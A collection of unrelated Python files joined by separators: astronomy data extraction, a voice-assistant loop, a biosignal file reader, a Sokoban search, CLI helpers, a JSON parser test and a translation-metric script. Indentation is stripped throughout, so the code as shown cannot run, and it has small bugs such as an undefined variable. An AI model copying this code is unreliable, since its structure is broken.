line = line + 'level=1\n'
line = line + 'filetype=evt1\n'
line = line + 'tstart=' + str(start) + '\n'
line = line + 'tstop=' + str(stop) + '\n'
line = line + 'go\n'
run_arc5gl(line, out='zlist')
data = mcf.read_data_file('zlist', remove=1)
#
#--- choose files with only non-calibration data
#
file_list = []
for ent in data:
mc = re.search('acisf', ent)
if mc is None:
continue
ftemp = re.split('\s+', ent)
atemp = re.split('acisf', ftemp[0])
btemp = re.split('_', atemp[1])
ctemp = re.split('N', btemp[0])
mark = int(ctemp[0])
if mark < 50000:
file_list.append(ftemp[0])
return file_list
#---------------------------------------------------------------------------------
#--- extract_data: extract time and ccd_id from the fits file and create count rate data
#---------------------------------------------------------------------------------
def extract_data(ifile, out_dir):
"""
extract time and ccd_id from the fits file and create count rate data
input: file --- fits file data
out_dir --- the directory in which data will be saved
output: ccd<ccd>--- 5 min accumulated count rate data file
"""
#
#--- extract time and ccd id information from the given file
#
data = pyfits.getdata(ifile, 0)
time_col = data.field('TIME')
ccdid_col = data.field('CCD_ID')
#
#--- initialize
#
diff = 0
chk = 0
ccd_c = [0 for x in range(0, 10)]
ccd_h = [[] for x in range(0, 10)]
ftime = -999
#
#--- check each line and count the numbers of ccd in the each 300 sec intervals
#
for k in range(0, len(time_col)):
try:
stime = float(time_col[k])
if stime <= 0:
continue
ccd_id = int(float(ccdid_col[k]))
except:
continue
if ftime < 0:
ftime = stime
diff = 0
else:
diff = stime - ftime
if diff >= 300.0:
#
#--- save counts after accumunrating for 300 sec
#
for i in range(0, 10):
line = str(ftime) + '\t' + str(ccd_c[i]) + '\n'
ccd_h[i].append(line)
#
#--- reinitialize for the next round
#
ccd_c[i] = 0
ccd_c[ccd_id] += 1
ftime = stime
diff = 0
#
#--- accumurate the count until the 300 sec interval is reached
#
else:
ccd_c[ccd_id] += 1
#
#--- for the case the last interval is less than 300 sec,
#--- estimate the the numbers of hit and adjust
#
if diff > 0 and diff < 300:
ratio = 300.0 / diff
for i in range(0, 10):
ccd_c[i] *= ratio
ccd_c[i] = int(ccd_c[i])
line = str(stime) + '\t' + str(ccd_c[i]) + '\n'
ccd_h[i].append(line)
#
#--- print out the results
#
for i in range(0, 10):
ofile = out_dir + '/ccd' + str(i)
with open(ofile, 'a') as fo:
for ent in ccd_h[i]:
fo.write(ent)
#-------------------------------------------------------------------------------
#-- get_ephin_data: extract ephin data and create ephin_data file --
#-------------------------------------------------------------------------------
def get_ephin_data(year, mon, out_dir):
"""
extract ephin data and create ephin_data file
input: year --- year
mon --- month
out_dir --- output directory
output: out_dir/ehin_data
"""
#
#--- set data extraction time period (one month)
#
[start, stop] = set_start_stop_time(year, month)
#
#--- first create a list of ephin fits file for the month
#
line = 'operation=browse\n'
line = line + 'dataset=flight\n'
line = line + 'detector=ephin\n'
line = line + 'level=1\n'
line = line + 'filetype=ephrates\n'
line = line + 'tstart=' + start + '\n'
line = line + 'tstop=' + stop + '\n'
line = line + 'go\n'
run_arc5gl(line, out='./elist')
data = mcf.read_data_file('./elist', remove=1)
#
#--- extract ephin fits file one by one and analyze
#
for ent in data:
mc = re.search('fits', ent)
if mc is not None:
atemp = re.split('\s+', ent)
fits = atemp[0]
line = 'operation=retrieve\n'
line = line + 'dataset=flight\n'
line = line + 'detector=ephin\n'
line = line + 'level=1\n'
line = line + 'filetype=ephrates\n'
line = line + 'filename=' + fits + '\n'
line = line + 'go\n'
run_arc5gl(line)
cmd = 'gzip -d *fits.gz'
os.system(cmd)
extract_ephin_data(fits, out_dir)
#-------------------------------------------------------------------------------
#-- extract_ephin_data: extract ephine data from a given data file name and save it in out_dir --
#-------------------------------------------------------------------------------
def extract_ephin_data(ifile, out_dir):
"""
extract ephine data from a given data file name and save it in out_dir
input: ifile --- ephin data file name
out_dir --- directory which the data is saved
output: <out_dir>/ephin_data --- ephin data (300 sec accumulation)
"""
#
#--- extract time and ccd id information from the given file
#
data = pyfits.getdata(ifile, 1)
time_r = data.field("TIME")
scp4_r = data.field("SCP4")
sce150_r = data.field("SCE150")
sce300_r = data.field("SCE300")
sce1500_r = data.field("SCE1300")
#
#--- initialize
#
ephin_data = []
#
#--- sdata[0]: scp4, sdata[1]: sce150, sdata[2]: sce300, and sdata[3]: sce1300
#
sdata = [0 for x in range(0,4)]
ftime = -999
#
#--- check each line and count the numbers of ccd in the each 300 sec intervals
#
for k in range(0, len(time_r)):
try:
stime = float(time_r[k])
if stime <= 0:
continue
sd0 = float(scp4_r[k])
sd1 = float(sce150_r[k])
sd2 = float(sce300_r[k])
sd3 = float(sce1500_r[k])
except:
continue
if ftime < 0:
ftime = stime
diff = 0
else:
diff = stime - ftime
if diff >= 300.0:
#
#--- save counts per 300 sec
#
line = str(ftime)
for j in range(0, 4):
line = line + '\t%4.4f' % (round(sdata[j],4))
line = line + '\n'
ephin_data.append(line)
#
#--- re-initialize for the next round
#
sdata[0] = sd0
sdata[1] = sd1
sdata[2] = sd2
sdata[3] = sd3
ftime = stime
#
#--- accumurate the count until the 300 sec interval is reached
#
else:
sdata[0] += sd0
sdata[1] += sd1
sdata[2] += sd2
sdata[3] += sd3
diff = stime - ftime
#
#--- for the case the last interval is less than 300 sec,
#--- estimate the the numbers of hit and adjust
#
if (diff > 0) and (diff < 300):
line = str(ftime)
ratio = 300.0 / diff
for j in range(0, 4):
var = sdata[j] * ratio
line = line + '\t%4.4f' % (round(var,4))
line = line + '\n'
ephin_data.append(line)
#
#--- print out the data
#
ofile = out_dir + '/ephin_rate'
with open(ofile, 'a') as fo:
for ent in ephin_data:
fo.write(ent)
mcf.rm_files(ifile)
#-------------------------------------------------------------------------------
#-- cleanUp: sort and remove duplicated lines in all files in given data directory ---
#-------------------------------------------------------------------------------
def cleanUp(cdir):
"""
sort and remove duplicated lines in all files in given data directory
Input cdir --- directory name
Output cdir/files --- cleaned up files
"""
if os.path.isdir(cdir):
cmd = 'ls ' + cdir + '/* > ' + zspace
os.system(cmd)
flist = mcf.read_data_file(zspace, remove=1)
for ifile in flist:
data = mcf.read_data_file(ifile)
if len(data) < 2:
continue
data = sorted(data)
prev = data[0]
line = data[0] + '\n'
for comp in data[1:]:
if comp == prev:
continue
else:
line = line + comp + '\n'
prev = comp
with open(ifile, 'w') as fo:
fo.write(line)
#-------------------------------------------------------------------------------
#-- run_arc5gl: run arc5gl command --
#-------------------------------------------------------------------------------
def run_arc5gl(line, out=''):
"""
run arc5gl command
input: line --- acc5gl command lines
out --- output file name; default: "" --- no output file
output: results of the command
"""
with open(zspace, 'w') as fo:
fo.write(line)
try:
cmd = '/proj/sot/ska/bin/arc5gl -user isobe -script ' + zspace
if out != '':
cmd = cmd + '> ' + out
os.system(cmd)
except:
try:
cmd = '/proj/axaf/simul/bin/arc5gl -user isobe -script ' + zspace
if out != '':
cmd = cmd + '> ' + out
os.system(cmd)
except:
cmd1 = "/usr/bin/env PERL5LIB= "
cmd2 = '/proj/axaf/simul/bin/arc5gl -user isobe -script ' + zspace
if out != '':
cmd2 = cmd2 + '> ' + out
cmd = cmd1 + cmd2
bash(cmd, env=ascdsenv)
mcf.rm_files(zspace)
#-------------------------------------------------------------------------------
#-- set_start_stop_time: create start and stop time in the format of arc5gl --
#-------------------------------------------------------------------------------
def set_start_stop_time(year, month):
"""
create start and stop time in the format of arc5gl
input: year --- year
month --- month
output: start --- in format of <yyyy>-<mm>-01T00:00:00
output: stop --- in format of <yyyy>-<mm>-01T00:00:00
"""
nyear = year
nmonth = month + 1
if nmonth > 12:
nmonth = 1
nyear += 1
smonth = str(month)
if month < 10:
smonth = '0' + smonth
snmonth = str(nmonth)
if nmonth < 10:
snmonth = '0' + snmonth
start = str(year) + '-' + smonth + '-01T00:00:00'
stop = str(nyear) + '-' + snmonth + '-01T00:00:00'
return [start, stop]
#------------------------------------------------------------
if __name__ == "__main__":
if len(sys.argv) == 1:
get_data_for_month('', '')
elif len(sys.argv) == 3:
year = int(sys.argv[1])
month = int(sys.argv[2])
get_data_for_month(year, month)
else:
print("get_data_for_month.py <year> <month>")
exit(1)
|
# -*- coding: utf-8 -*-
# Personal Assistant Reliable Intelligent System
# By Tanguy De Bels
from Brains.social import *
from Brains.utils import *
from Brains.net import *
from Brains.custom import *
import Utilities.vars
import Utilities.tools
import Senses
import os
import re
import pickle
from nltk.stem.snowball import FrenchStemmer
stemmer = FrenchStemmer()
#loading env from vars
with open(files(0), mode = 'r') as f:
trigger_ht = pickle.load(f)
f.close()
with open(files(1), mode = 'r') as f:
composed_trigger_ht = pickle.load(f)
f.close()
with open(files(2), mode = 'r') as f:
macro_paths_ht = pickle.load(f)
f.close()
with open(files(3), mode = 'r') as f:
custom_interactions_ht = pickle.load(f)
f.close()
#main loop
while vars.boucling == True:
msg = listen()
if msg is not None:
words = re.findall(r"[\w]+", msg, re.UNICODE)
last_index = 0
for idx in range(len(words)):
w = stemmer.stem(words[idx])
if w in trigger_ht.keys():
for k in composed_trigger_ht.keys():
if k in u" ".join(w for w in words[last_index+1:idx]):
if composed_trigger_ht[k] == macro_exe:
macro_exe(macro_paths_ht, k)
elif composed_trigger_ht[k] == dial_exe:
dial_exe(custom_interactions_ht, k)
else:
composed_trigger_ht[k](msg)
last_index = idx
if trigger_ht[w] == macro_exe:
macro_exe(macro_paths_ht, w)
elif trigger_ht[w] == dial_exe:
dial_exe(custom_interactions_ht, w)
else:
trigger_ht[w](msg)
for k in composed_trigger_ht.keys():
if k in u" ".join(w for w in words[last_index+1:]):
if composed_trigger_ht[k] == macro_exe:
macro_exe(macro_paths_ht, k)
elif composed_trigger_ht[k] == dial_exe:
dial_exe(custom_interactions_ht, k)
else:
composed_trigger_ht[k](msg)
|
"""
Module for reading ME6000 .tff format files.
http://www.biomation.com/kin/me6000.htm
"""
import datetime
import os
import struct
import numpy as np
def rdtff(file_name, cut_end=False):
"""
Read values from a tff file.
Parameters
----------
file_name : str
Name of the .tff file to read.
cut_end : bool, optional
If True, cuts out the last sample for all channels. This is for
reading files which appear to terminate with the incorrect
number of samples (ie. sample not present for all channels).
Returns
-------
signal : ndarray
A 2d numpy array storing the physical signals from the record.
fields : dict
A dictionary containing several key attributes of the read record.
markers : ndarray
A 1d numpy array storing the marker locations.
triggers : ndarray
A 1d numpy array storing the trigger locations.
Notes
-----
This function is slow because tff files may contain any number of
escape sequences interspersed with the signals. There is no way to
know the number of samples/escape sequences beforehand, so the file
is inefficiently parsed a small chunk at a time.
It is recommended that you convert your tff files to WFDB format.
"""
file_size = os.path.getsize(file_name)
with open(file_name, "rb") as fp:
fields, file_fields = _rdheader(fp)
signal, markers, triggers = _rdsignal(
fp,
file_size=file_size,
header_size=file_fields["header_size"],
n_sig=file_fields["n_sig"],
bit_width=file_fields["bit_width"],
is_signed=file_fields["is_signed"],
cut_end=cut_end,
)
return signal, fields, markers, triggers
def _rdheader(fp):
"""
Read header info of the windaq file.
Parameters
----------
fp : file IO object
The input header file to be read.
Returns
-------
fields : dict
For interpreting the waveforms.
file_fields : dict
For reading the signal samples.
"""
tag = None
# The '2' tag indicates the end of tags.
while tag != 2:
# For each header element, there is a tag indicating data type,
# followed by the data size, followed by the data itself. 0's
# pad the content to the nearest 4 bytes. If data_len=0, no pad.
tag = struct.unpack(">H", fp.read(2))[0]
data_size = struct.unpack(">H", fp.read(2))[0]
pad_len = (4 - (data_size % 4)) % 4
pos = fp.tell()
# Currently, most tags will be ignored...
# storage method
if tag == 1001:
storage_method = fs = struct.unpack("B", fp.read(1))[0]
storage_method = {0: "recording", 1: "manual", 2: "online"}[
storage_method
]
# fs, unit16
elif tag == 1003:
fs = struct.unpack(">H", fp.read(2))[0]
# sensor type
elif tag == 1007:
# Each byte contains information for one channel
n_sig = data_size
channel_data = struct.unpack(">%dB" % data_size, fp.read(data_size))
# The documentation states: "0 : Channel is not used"
# This means the samples are NOT saved.
channel_map = (
(1, 1, "emg"),
(15, 30, "goniometer"),
(31, 46, "accelerometer"),
(47, 62, "inclinometer"),
(63, 78, "polar_interface"),
(79, 94, "ecg"),
(95, 110, "torque"),
(111, 126, "gyrometer"),
(127, 142, "sensor"),
)
sig_name = []
# The number range that the data lies between gives the
# channel
for data in channel_data:
# Default case if byte value falls outside of channel map
base_name = "unknown"
# Unused channel
if data == 0:
n_sig -= 1
break
for item in channel_map:
if item[0] <= data <= item[1]:
base_name = item[2]
break
existing_count = [base_name in name for name in sig_name].count(
True
)
sig_name.append("%s_%d" % (base_name, existing_count))
# Display scale. Probably not useful.
elif tag == 1009:
# 100, 500, 1000, 2500, or 8500uV
display_scale = struct.unpack(">I", fp.read(4))[0]
# sample format, uint8
elif tag == 3:
sample_fmt = struct.unpack("B", fp.read(1))[0]
is_signed = bool(sample_fmt >> 7)
# ie. 8 or 16 bits
bit_width = sample_fmt & 127
# Measurement start time - seconds from 1.1.1970 UTC
elif tag == 101:
n_seconds = struct.unpack(">I", fp.read(4))[0]
base_datetime = datetime.datetime.utcfromtimestamp(n_seconds)
base_date = base_datetime.date()
base_time = base_datetime.time()
# Measurement start time - minutes from UTC
elif tag == 102:
n_minutes = struct.unpack(">h", fp.read(2))[0]
# Go to the next tag
fp.seek(pos + data_size + pad_len)
header_size = fp.tell()
# For interpreting the waveforms
fields = {
"fs": fs,
"n_sig": n_sig,
"sig_name": sig_name,
"base_time": base_time,
"base_date": base_date,
}
# For reading the signal samples
file_fields = {
"header_size": header_size,
"n_sig": n_sig,
"bit_width": bit_width,
"is_signed": is_signed,
}
return fields, file_fields
def _rdsignal(fp, file_size, header_size, n_sig, bit_width, is_signed, cut_end):
"""
Read the signal.
Parameters
----------
fp : file IO object
The input header file to be read.
file_size : int
Size of the file in bytes.
header_size : int
Size of the header file in bytes.
n_sig : int
The number of signals contained in the dat file.
bit_width : int
The number of bits necessary to represent the number in binary.
is_signed : bool
Whether the number is signed (True) or not (False).
cut_end : bool, optional
If True, enables reading the end of files which appear to terminate
with the incorrect number of samples (ie. sample not present for all channels),
by checking and skipping the reading the end of such files.
Checking this option makes reading slower.
Returns
-------
signal : ndarray
Tranformed expanded signal into uniform signal.
markers : ndarray
A 1d numpy array storing the marker locations.
triggers : ndarray
A 1d numpy array storing the trigger locations.
"""
# Cannot initially figure out signal length because there
# are escape sequences.
fp.seek(header_size)
signal_size = file_size - header_size
byte_width = int(bit_width / 8)
# numpy dtype
dtype = str(byte_width)
if is_signed:
dtype = "i" + dtype
else:
dtype = "u" + dtype
# big endian
dtype = ">" + dtype
# The maximum possible samples given the file size
# All channels must be present
max_samples = int(signal_size / byte_width)
max_samples = max_samples - max_samples % n_sig
# Output information
signal = np.empty(max_samples, dtype=dtype)
markers = []
triggers = []
# Number of (total) samples read
sample_num = 0
# Read one sample for all channels at a time
if cut_end:
stop_byte = file_size - n_sig * byte_width + 1
while fp.tell() < stop_byte:
chunk = fp.read(2)
sample_num = _get_sample(
fp, chunk, n_sig, dtype, signal, markers, triggers, sample_num
)
else:
while True:
chunk = fp.read(2)
if not chunk:
break
sample_num = _get_sample(
fp, chunk, n_sig, dtype, signal, markers, triggers, sample_num
)
# No more bytes to read. Reshape output arguments.
signal = signal[:sample_num]
signal = signal.reshape((-1, n_sig))
markers = np.array(markers, dtype="int")
triggers = np.array(triggers, dtype="int")
return signal, markers, triggers
def _get_sample(fp, chunk, n_sig, dtype, signal, markers, triggers, sample_num):
"""
Get the total number of samples in the signal.
Parameters
----------
fp : file IO object
The input header file to be read.
chunk : str
The data currently being processed.
n_sig : int
The number of signals contained in the dat file.
dtype : str
String numpy dtype used to store the signal of the given
resolution.
signal : ndarray
Tranformed expanded signal into uniform signal.
markers : ndarray
A 1d numpy array storing the marker locations.
triggers : ndarray
A 1d numpy array storing the trigger locations.
sample_num : int
The total number of samples in the signal.
Returns
-------
sample_num : int
The total number of samples in the signal.
"""
tag = struct.unpack(">h", chunk)[0]
# Escape sequence
if tag == -32768:
# Escape sequence structure: int16 marker, uint8 type,
# uint8 length, uint8 * length data, padding % 2
escape_type = struct.unpack("B", fp.read(1))[0]
data_len = struct.unpack("B", fp.read(1))[0]
# Marker*
if escape_type == 1:
# *In manual mode, this could be block start/top time.
# But we are it is just a single time marker.
markers.append(sample_num / n_sig)
# Trigger
elif escape_type == 2:
triggers.append(sample_num / n_sig)
fp.seek(data_len + data_len % 2, 1)
# Regular samples
else:
fp.seek(-2, 1)
signal[sample_num : sample_num + n_sig] = np.fromfile(
fp, dtype=dtype, count=n_sig
)
sample_num += n_sig
return sample_num
|
"""
Explorations for Sokoban.
Fill free to add new exploration code here.
"""
import pygame
from pygame.locals import *
import common as C
from utils import *
import queue
import heapq
from time import time
from math import sqrt
class DFS:
"""
Classical Depth-First Search walkthrough of the level to discover what is
the "interior" and "exterior.
"""
def __init__(self, level):
self.level = level
def search_floor(self, source):
init_x, init_y = source
# to remember which tiles have been visited or not
mark = [[False for x in range(self.level.width)]
for y in range(self.level.height)]
def rec_explore(position):
x, y = position
if mark[y][x]:
return
# mark current position as visited
mark[y][x] = True
for d, (mx, my) in enumerate(C.DIRS):
if self.level.is_wall((x+mx, y+my)):
continue
rec_explore((x+mx, y+my))
rec_explore(source)
return mark
|
import click
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
def error(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg, fg="red"))
def warning(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg, fg="yellow"))
def info(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg))
def success(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg, fg="green"))
def requests_retry_session(
retries=4, backoff_factor=0.4, status_forcelist=(500, 502, 504), session=None
):
"""Opinionated wrapper that creates a requests session with a
HTTPAdapter that sets up a Retry policy that includes connection
retries.
If you do the more naive retry by simply setting a number. E.g.::
adapter = HTTPAdapter(max_retries=3)
then it will raise immediately on any connection errors.
Retrying on connection errors guards better on unpredictable networks.
From http://docs.python-requests.org/en/master/api/?highlight=retries#requests.adapters.HTTPAdapter
it says: "By default, Requests does not retry failed connections."
The backoff_factor is documented here:
https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#urllib3.util.retry.Retry
A default of retries=3 and backoff_factor=0.3 means it will sleep like::
[0.3, 0.6, 1.2]
""" # noqa
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount("http://", adapter)
session.mount("https://", adapter)
return session
def _humanize_time(amount, units):
"""Chopped and changed from http://stackoverflow.com/a/6574789/205832"""
intervals = (1, 60, 60 * 60, 60 * 60 * 24, 604800, 2419200, 29030400)
names = (
("second", "seconds"),
("minute", "minutes"),
("hour", "hours"),
("day", "days"),
("week", "weeks"),
("month", "months"),
("year", "years"),
)
result = []
unit = [x[1] for x in names].index(units)
# Convert to seconds
amount = amount * intervals[unit]
for i in range(len(names) - 1, -1, -1):
a = int(amount) // intervals[i]
if a > 0:
result.append((a, names[i][1 % a]))
amount -= a * intervals[i]
return result
def humanize_seconds(seconds):
return "{} {}".format(*_humanize_time(seconds, "seconds")[0])
|
from __future__ import print_function
import json
import unittest
import sys
from peggy.peggy import PackratParser, Not, ZeroOrMore
# References : https://github.com/antlr/grammars-v4/blob/master/json/JSON.g4
# TODO Think and optimize spaces
class JsonParser(PackratParser):
def __init__(self, text):
rules = {
"parse": [
["_", "object", "_", Not(r".")],
["_", "array", "_", Not(r".")]
],
"object": [
[r"[{]", "_", "pair", "_",
ZeroOrMore("_", r"[,]", "_", "pair"), "_", r"[}]", "@dict_"],
[r"[{]", "_", r"[}]", "@empty_dict"]
],
"array": [
[r"[\[]", "_", "value", "_",
ZeroOrMore("_", r"[,]", "_", "value"), r"[\]]", "@list_"],
[r"[\[]", "_", r"[\]]", "@empty_list"]
],
"pair": [
["_", "string", "_", r"[:]", "_", "value", "_", "@hug"]
],
"value": [
["string"],
["number"],
["object"],
["array"],
[r"(true)", "@special"],
[r"(false)", "@special"],
[r"(null)", "@special"]
],
"string": [
[r'"((?:\\.|[^"\\])*)"', "@unescape"]
],
"number": [
[r"(\d+)", "@to_int"]
],
"_": [
[r"(?:\s|\r|\n)*"]
]
}
PackratParser.__init__(self, rules, text)
def parse(self):
return self.try_parse()
@staticmethod
def dict_(*args):
return dict(args),
@staticmethod
def empty_dict(*_):
return {},
@staticmethod
def list_(*args):
return list(args),
@staticmethod
def empty_list(*_):
return [],
@staticmethod
def unescape(string):
if sys.version[0] == "2":
return string.decode("string_escape"),
else:
return string.decode("unicode_escape"),
@staticmethod
def special(value):
if value == "true":
return True,
elif value == "false":
return False,
elif value == "null":
return None,
assert False, "Invalid Special {val}".format(val=value)
class TestJsonParser(unittest.TestCase):
def test_json_basic(self):
objects = [
{"he\\l\"lo": "world", "hi": {"alternative": "reality"}},
{"null_checker": None, "hi": {"false": False, "true": True}},
[["A"], "2", [[[]], {}]],
{"Hello": None, "World": [[[1]]]}
]
for obj in objects:
s = json.dumps(obj)
parser = JsonParser(s)
parsed_object, = parser.parse()
print("Original::\n{obj}\nParsed::\n{parsed}\n\n".format(
obj=s, parsed=json.dumps(parsed_object)))
self.assertEqual(obj, parsed_object)
|
from __future__ import absolute_import, division, print_function
import numpy as np
import torch
from pyemd import emd
from collections import defaultdict
from transformers import *
def tokenize(text):
"""
Tokenizes a text and maps tokens to token-ids
"""
return tokenizer.convert_tokens_to_ids(tokenizer.tokenize(text))
def get_sentence_features(tokens, pad_seq_length: int):
"""
Convert tokenized sentence in its embedding ids, segment ids and mask
:param tokens:
a tokenized sentence
:param pad_seq_length:
the maximal length of the sequence. Cannot be greater than self.sentence_transformer_config.max_seq_length
:return: embedding ids, segment ids and mask for the sentence
"""
pad_seq_length = min(pad_seq_length, max_seq_length) + 2 #Add space for special tokens
return tokenizer.prepare_for_model(tokens, max_length=pad_seq_length, pad_to_max_length=True, return_tensors='pt')
def encode(features):
"""Returns token_embeddings, cls_token"""
#RoBERTa does not use token_type_ids
output_states = model(**features)
output_tokens = output_states[0]
cls_tokens = output_tokens[:, 0, :] # CLS token is first token
features.update({'token_embeddings': output_tokens, 'cls_token_embeddings': cls_tokens, 'attention_mask': features['attention_mask']})
if model.config.output_hidden_states:
hidden_states = output_states[2]
features.update({'all_layer_embeddings': hidden_states})
return features
def get_word_embedding_dimension() -> int:
return model.config.hidden_size
def padding(arr, pad_token, dtype=torch.long):
lens = torch.LongTensor([len(a) for a in arr])
max_len = lens.max().item()
padded = torch.ones(len(arr), max_len, dtype=dtype) * pad_token
mask = torch.zeros(len(arr), max_len, dtype=torch.long)
for i, a in enumerate(arr):
padded[i, :lens[i]] = torch.tensor(a, dtype=dtype)
mask[i, :lens[i]] = 1
return padded, lens, mask
def collate_idf(arr, tokenize, numericalize,
pad="[PAD]", device='cuda:0'):
tokens = [["<s>"]+tokenize(a)+["</s>"] for a in arr]
arr = [numericalize(a) for a in tokens]
pad_token = 1
padded, lens, mask = padding(arr, pad_token, dtype=torch.long)
padded = padded.to(device=device)
mask = mask.to(device=device)
lens = lens.to(device=device)
return padded, lens, mask, tokens
def produce_tokens_masks(sent, max_length):
input_ids = tokenizer.convert_tokens_to_ids(create_tokens(sent, None, max_length))
# token_type_ids = [0] * len(input_ids)
attention_mask = [1] * len(input_ids)
pad_token = 1
padding_length = max_length - len(input_ids)
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
return input_ids, attention_mask
def get_embedding(layer, sentences, batch_size= 8):
padded_sens, lens, mask, tokens = collate_idf(sentences,
tokenizer.tokenize,
tokenizer.convert_tokens_to_ids,
device='cuda')
features = {"input_ids": padded_sens, "attention_mask": mask, "token_type_ids": None}
with torch.no_grad():
output_states = model(**features)
all_embeddings = output_states[2][layer]
input_mask = features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(all_embeddings.size()).float()
all_embeddings = all_embeddings * input_mask_expanded
return all_embeddings, mask
def z_norm(inputs):
mean = inputs.mean(0, keepdim=True)
var = inputs.var(0, unbiased=False, keepdim=True)
return (inputs - mean) / torch.sqrt(var + 1e-9)
def batched_cdist_l2(x1, x2):
x1_norm = x1.pow(2).sum(dim=-1, keepdim=True)
x2_norm = x2.pow(2).sum(dim=-1, keepdim=True)
res = torch.baddbmm(
x2_norm.transpose(-2, -1),
x1,
x2.transpose(-2, -1),
alpha=-2
).add_(x1_norm).clamp_min_(1e-30).sqrt_()
return res
def _safe_divide(numerator, denominator):
return numerator / (denominator + 1e-30)
def optimal_score(layer, refs, hyps, is_norm=False, batch_size=256, device='cuda:0'):
scores = []
for batch_start in range(0, len(refs), batch_size):
batch_refs = refs[batch_start:batch_start+batch_size]
batch_hyps = hyps[batch_start:batch_start+batch_size]
ref_embedding, ref_masks = get_embedding(layer, batch_refs, batch_size)
hyp_embedding, hyp_masks = get_embedding(layer, batch_hyps, batch_size)
ref_idf = ref_masks.float().cpu()
hyp_idf = hyp_masks.float().cpu()
if is_norm:
ref_embedding = z_norm(ref_embedding)
hyp_embedding = z_norm(hyp_embedding)
raw = torch.cat([ref_embedding, hyp_embedding], 1)
raw.div_(torch.norm(raw, dim=-1).unsqueeze(-1) + 1e-30)
distance_matrix = batched_cdist_l2(raw, raw).cpu().numpy().astype('float64')
for i in range(batch_size):
c1 = np.zeros(raw.shape[1], dtype=np.float)
c2 = np.zeros_like(c1)
c1[:len(ref_idf[i])] = ref_idf[i]
c2[len(ref_idf[i]):] = hyp_idf[i]
c1 = _safe_divide(c1, np.sum(c1))
c2 = _safe_divide(c2, np.sum(c2))
score = emd(c1, c2, distance_matrix[i])
scores.append(1./(1. + score))
return scores
import pandas as pd
import truecase
from scipy.stats import pearsonr
def pearson_and_spearman(preds, labels):
pearson_corr = pearsonr(preds, labels)[0]
return '{0:.{1}f}'.format(pearson_corr, 3)
from utils import remove_word_contraction, clean_text
import spacy_udpipe
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--src", default='fr', type=str, help="source language")
parser.add_argument("--tgt", default='en', type=str, help="target language")
parser.add_argument("--is_align", default=True, type=bool, help="whether or not joint-alignment is enabled")
parser.add_argument("--model_path", default='../model/xlm-roberta-base_align_lang_18', type=str)
parser.add_argument("--layer", default='-1', type=int, help='in which layer embeddings are obtained')
args = parser.parse_args()
spacy_udpipe.download(args.src)
spacy_udpipe.download(args.tgt)
if not args.is_align:
model_name = 'xlm-roberta-base'
else:
model_name = args.model_path
dataset_path = 'dataset/testset_{}-{}.tsv'.format(args.src, args.tgt)
model = XLMRobertaModel.from_pretrained(model_name, output_hidden_states=True)
tokenizer = XLMRobertaTokenizer.from_pretrained(model_name, do_lower_case=False)
max_seq_length = tokenizer.max_len_single_sentence
device = 'cuda'
model.eval()
model.to('cuda')
data = pd.read_csv(dataset_path, sep='\t')
translations = data['translation'].tolist()
source = data['source'].tolist()
human_score = data['HUMAN_score'].tolist()
sentBLEU = data['sentBLEU'].tolist()
from mosestokenizer import MosesDetokenizer
with MosesDetokenizer(args.src) as detokenize:
source = [detokenize(s.split(' ')) for s in source]
with MosesDetokenizer(args.tgt) as detokenize:
translations = [detokenize(s.split(' ')) for s in translations]
src_udpipe = spacy_udpipe.load(args.src)
tgt_udpipe = spacy_udpipe.load(args.tgt)
translations = [truecase.get_true_case(s) for s in translations]
source_manipulation, _ = remove_word_contraction(src_udpipe, source, args.src)
translations_manipulation, _ = remove_word_contraction(tgt_udpipe, translations, args.tgt)
source = [clean_text(s, args.src) for s in source]
translations = [clean_text(s, args.tgt) for s in translations]
source_manipulation = [clean_text(s, args.src) for s in source_manipulation]
translations_manipulation = [clean_text(s, args.tgt) for s in translations_manipulation]
if not args.is_align:
output_1 = optimal_score(args.layer, source, translations, is_norm=False, batch_size=8) # original
output_2 = optimal_score(args.layer, source, translations, is_norm=True, batch_size=8)# norm_space
output_3 = optimal_score(args.layer, source_manipulation, translations_manipulation, is_norm=False, batch_size=8) # norm_text
else:
output_1 = optimal_score(args.layer, source, translations, is_norm=False, batch_size=8) # align
output_2 = optimal_score(args.layer, source, translations, is_norm=True, batch_size=8)# align + norm_space
output_3 = optimal_score(args.layer, source_manipulation, translations_manipulation, is_norm=True, batch_size=8) # align + norm_space + norm_text
corr_1 = pearson_and_spearman(human_score, output_1)
corr_2 = pearson_and_spearman(human_score, output_2)
corr_3 = pearson_and_spearman(human_score, output_3)
print('layer:{} {}->{}'.format(args.layer, args.src, args.tgt), '{}->{}->{}'.format(corr_1, corr_2, corr_3))
|
from lib.imageManager import ImageManager
import os
import shutil
class DirectoryManager(ImageManager):
"""
This class allows to manage all the categories with directory on the local disk.
"""
def __init__(self):
"""
Initiate the directory manager by creating the directory in data/categories.
"""
# data directory
self.categories_director = 'data/categories'
# Generate data directory if it does not exist
if not os.path.exists(self.categories_director):
os.makedirs(self.categories_director)
def get_all(self):
"""
Get all the images paths.
:return: List of images absolute paths
"""
paths = []
# For each category ask for all its images paths
for cat in self.get_categories():
images = self.get_by_category(cat)
# Concat all the images in the same list
paths.extend(images)
return paths
def get_categories(self):
"""
Get all categories.
:return: List of all categories names
"""
return [name for name in os.listdir(self.categories_director)]
def get_by_category(self, category):
"""
Get images path for the given category.
:param category: Image category
:return: List of all images absolute paths
"""
return [os.path.join(os.path.abspath(self.categories_director), category, f) for f in
os.listdir(os.path.join(self.categories_director, category)) if
os.path.isfile(os.path.join(self.categories_director, category, f))]
def add_category(self, category):
"""
Add a new category.
:param category: Category name
:return: Nothing
"""
os.makedirs(os.path.join(self.categories_director, category))
def delete_category(self, category):
"""
Delete category and all its content.
:param category: Category name
:return: Nothing
"""
shutil.rmtree(os.path.join(self.categories_director, category))
def delete_by_category(self, category, image):
"""
Delete image in the given category. If the image does not exist raise FileNotFoundError.
